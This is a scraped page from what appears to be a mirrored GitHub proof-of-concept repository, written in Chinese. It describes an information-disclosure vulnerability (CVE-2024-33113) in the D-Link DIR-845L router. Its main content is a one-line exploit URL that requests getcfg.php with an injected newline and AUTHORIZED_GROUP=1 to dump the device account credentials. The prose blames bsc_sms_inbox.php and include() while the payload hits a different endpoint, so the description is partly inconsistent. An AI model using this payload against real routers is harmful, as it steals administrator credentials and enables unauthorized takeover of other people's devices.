POC/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞.md at e295abdf314a88629f7c3aedffa2c2f4ebafcc9e

admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

605 B

Raw Blame History

D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞

CVE-2024-33113 是 D-LINK DIR-845L 路由器中的一个漏洞，允许通过 bsc_sms_inbox.php 文件泄露信息。该漏洞是由于对 include() 函数处理不当而引起的，可以通过操纵 $file 变量来利用该漏洞。这使得攻击者可以包含任意 PHP 脚本并可能检索敏感信息，例如路由器的用户名和密码。

poc

http://IP:8080/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1

605 B Raw Blame History

D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞

poc

605 B

Raw Blame History